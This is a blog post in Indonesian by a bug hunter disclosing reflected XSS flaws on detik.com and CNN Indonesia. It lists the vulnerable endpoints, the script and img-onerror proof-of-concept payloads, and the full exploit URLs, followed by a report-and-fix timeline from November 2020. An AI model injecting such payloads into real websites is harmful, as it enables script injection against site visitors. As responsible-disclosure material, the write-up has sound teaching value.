Open in app

Sign in

Write

Sign in

REFLECTED XSS DI DETIK.COM , CNN INDONESIA

Aidil Arief
Dec 5, 2020

--

Hi Bug Hunter & teman-temanku semua. Maaf baru bisa menyempatkan waktu untuk menuliskan write up nya. Karena baru ada waktu juga hehe..

Baiklah langsung saja ke detail bug nya.

  1. Detikcom

Celah xss reflected yang saya temukan di situs detikcom waktu itu berada di fitur tag.

https://www.detik.com/tag/kanal

Payload yang digunakan :

"><script>prompt(document.domain)</script>

Final Url :

https://www.detik.com/tag/kanal"><script>prompt(document.domain)</script>

Disana saya berhasil menganalisa bahwa disana payload yang berhasil yaitu costum tag <>input</>

2. CNN Indonesia

Celah XSS REFLECTED yang saya temukan di situs CNN Indonesia terdapat pada bagian kanal berita.

https://www.cnnindonesia.com/search/?query=Hh&kanal=olahraga

Payload yang digunakan

"><img src=x onerror=prompt(document.domain)>

Final url :

https://www.cnnindonesia.com/search/?query=Hh&kanal=olahraga"><img src=x onerror=prompt(document.domain)>

Timeline:

Report : 8/11/2020

Valid report : 9/11/2020

Fix : 9/11/2020

Reward : Sertifikat & Kiriman Paket Bingkisan ( 11/11/2020 )

Fb : https://www.facebook.com/aidilarf.co.id

Bug Hunter
Xss Vulnerability
Xss Attack
Penetration Testing

--

--

Aidil Arief
Aidil Arief

Written by Aidil Arief

789 Followers
3 Following

Keep to secure the internet

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams